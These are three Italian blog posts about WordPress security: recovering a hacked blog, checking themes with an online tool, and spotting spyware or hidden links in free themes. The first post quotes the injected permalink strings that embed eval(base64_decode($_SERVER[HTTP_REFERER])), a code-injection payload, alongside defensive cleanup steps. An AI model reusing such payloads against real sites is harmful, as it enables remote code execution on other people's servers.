Dopo aver trascorso qualche giorno di vacanza, sono rientrato a casa, ed accendendo il computer dopo un breve periodo di inutilizzo, mi accorgo di un’amara sorpresa proprio in questo blog.

Workpress.net è stato colpito da un attacco hacker!

La colpa è sicuramente del mancato aggiornamento all’ultima versione del nostro amato Cms, prima di partire per le vacanze, lasciando quindi il blog vulnerabile ad attacchi esterni. Proprio pochi giorni fà era circolata la notizia delle falle di sicurezza nelle ultime versioni di WordPress, prontamente corrette con la versione 2.8.4 del Cms.

Symptoms of an hacked blog

Mi sono accorto di essere stato attaccato, dalle statistiche del blog che vedevano una drastica riduzione delle pageviews. Controllando direttamente sul blog mi sono accorto che ogni link presente nelle pagine del blog puntava ad un redirect esterno, in particolare ai link presenti nel blog venivano inserita questa stringa:

%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929

Ovvero la struttura dei permalinks del mio blog veniva modificata con l’aggiunta dell stringa qui sopra.

Altri esempi di redirect:

• %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
• “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

How can I clean my hacked blog?

Dopo una rapida ricerca sul forum di WordPress e su Google, mi sono messo all’opera per eliminare potenziali infezioni dal mio blog.

Ecco un breve elenco delle operazioni da eseguire:

1. Ho cancellato dal pannello di amministrazione un utente estraneo che aveva permessi da amministratore, creato ad hoc dall’attacco hacker, agendo direttamente dal pannello di phpMyAdmin (qualora non dovesse funzionare il comando delete dal pannello di controllo di WordPress)
2. Ho cancellato completamente i file di wordpress (escluso il file wp-config e la cartella wp-content)
3. Ho scaricato l’ultima versione di WordPress, la 2.8.4. e l’ho caricata con Ftp sul server.
4. Ho eseguito l’accesso al blog ed aggiornato le tabelle del database come da procedura guidata indicata dalla nuova installazione.
5. Ho cancellato e ricaricato il tema del blog sul server.
6. Ho cancellato e ricaricato tutti i plugin installati sul blog.
7. Ed infine ho cambiato la password di amministrazione del blog.

How to control if my blog was cleaned?

Cercando con Google casi analoghi ho trovato il blog di Donncha, sviluppatore irlandese di WordPress, che metteva a disposizione un utile plugin per controllare lo stato di salute del vostro blog. Basta scaricarlo, installarlo ed attivarlo dal vostro pannello di controllo e potrete vedere se il vostro blog è stato ripulito per bene da codice malware.

Ecco il link per scaricare il plugin Exploit-scanner di Donncha. Scarica plugin

In conclusione voglio suggerire a tutti di impiegare un pò del proprio tempo per aggiornare prontamente la propria versione di wordpress installata nel proprio server, per evitare di venir attaccati e rischiare di perdere il proprio prezioso lavoro.

Prevenire è meglio che curare!

How to clean an hacked wordpress blog is a post from: WordPress tutorial, news, plugin and themes reviews

Vi avevo anticipato di quanto possa essere “pericoloso” scaricare un theme gratuito per il vostro blog, con le minacce di installare sul nostro server, virus, spyware e link indesiderati.

Dopo aver fatto una sorta di tutorial per scoprire “manualmente” se il nostro nuovo template era infetto da malware vari, oggi vi propongo un ottimo strumento online, sviluppato da un italiano (come me) che permette di sottoporre ad un’accurata analisi il theme installato sul vostro blog, per capire quali rischi si corrono e se è necessario pensare ad un’alternativa grafica per esporre i contenuti del nostro blog.

Il tool online per testare il vostro theme è stato sviluppato da Mario Pascucci e lo potete trovare a questo Url:

http://www.ismprofessional.net/pascucci/wp-test.php

Sperando che possa esservi utile!

Fortunatamente i themes su cui girano i miei blog non hanno riscontrato malware e minacce varie, vale la pena testare il proprio blog visto che l’ottimo servizio offerto da Mario, è free!

Come controllare se il theme del tuo blog è infetto is a post from: WordPress tutorial, news, plugin and themes reviews

Tuttavia ci sono alcuni grafici che approfittano, della grande richiesta di themes gratuiti dedicati a WordPress, per contaminare tali themes. In particolare inserendo link nel codice del templates, invisibile ad occhio nudo dopo essere stato installato. Ma i rischi che si corrono scaricando un theme gratuito possono essere anche più gravi come in casi denunciati in cui gli spyware veicolavano virus ed andavano a scrivere sul databse del nostro blog. Oppure in alcuni casi si è riscontrato un redirect per i click di AdSense che venivano conteggiati su account esterni.

Vediamo alcuni esempi e trucchetti per scoprire se il nostro theme è contaminato da spyware o link non desiderati.

1. Inanzitutto prendete l’abitudine di scaricare themes da siti considerati sicuri, quindi direttamente dai siti degli autori o nel migliore dei casi dal repository ufficiale dei themes di WordPress.
2. Controllate il codice del vostro theme contenuto nei file header.php o footer.php ed i file con nomi simili tipo: header-txt.php in modo da individuare codice malevolo od estraneo al nostro blog.
3. Assicuratevi che non ci siano link esterni (esclusi quelli dei credits dell’autore) inseriti in div con attributi hidden, quindi non visibili una volta pubblicati, ma tuttavia funzionanti.
4. Controllate che nei file del nostro theme, non ci siano link a siti discutibili, come casinò, medicinali, pornografici etc…

Se proprio non volete correre rischi, ed essere sicuri al 100% dell’integrità del theme per il vostro blog, vi consiglio di spendere qualche dollaro per acquistare un premium theme per WordPress, che garantirà al vostro blog tutta la sicurezza di un lavoro bene eseguito ed una grafica esclusiva e personalizzata per i vostri contenuti.

Free themes per WordPress, attento agli spyware is a post from: WordPress tutorial, news, plugin and themes reviews